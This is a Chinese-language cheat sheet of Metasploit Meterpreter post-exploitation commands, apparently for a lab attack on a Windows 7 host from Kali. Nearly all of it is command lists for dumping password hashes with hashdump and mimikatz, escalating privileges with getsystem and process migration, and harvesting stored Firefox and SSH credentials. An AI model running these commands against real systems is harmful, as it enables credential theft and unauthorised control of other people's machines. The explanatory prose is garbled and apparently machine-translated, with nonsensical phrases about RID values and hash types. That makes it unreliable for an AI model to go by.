目录

调用内部网络信息收集

07口令破解

普通用户提权

08other

调用内部网络信息收集

卡利袭击者

目标胜利7

07口令破解

use post/windows/gather/hashdump //system permissions meterpreter

set session 1

exploit // 在tmp目录中存储的结果

use post/windows/gather/smart_hashdump

set session 1

exploit

格式

用户名:RID:LM-HASH值:NT-HASH值

rid是一个与窗口系统帐户相符的固定值,类似于Linux uid,gid号，为管理员500元,501 为客人。又叫,又叫,它们都加密到用户密码上,只不过加密方式不同

hashdump使用了一些模仿函数

load mimikatz

wdigest、kerberos、msv、ssp、tspkg、livessp

mimikatz_command -h

mimikatz_command -f a: // 要查询哪些模块

mimikatz_command -f samdump::hashes

mimikatz_command -f samdump::bootkey

普通用户提权

getuid

查看用户权限

hashdump

需要管理员的权限

getsystem

只是它表面上拥有管理权,却没有真正的管理权

ps

查看进程

getpid

查看当前进程

migrate

进程转移(将普通用户进程转移到管理员用户进程)

hashdump

08other

确定目标主机是否是一个虚拟主机:

run checkvm

获取目标主机上的软件安装信息:

run post/windows/gather/enum_applications

获取最近访问的文件和链接目标主机的信息:

run post/windows/gather/dumplinks

查看目标环境信息：

run post/windows/gather/env

查看在Firefox中存储的帐户密码:

run post/windows/gather/firefox_creds

查看ssh帐户密码的秘密消息和证书信息:

run post/windows/gather/ssh_creds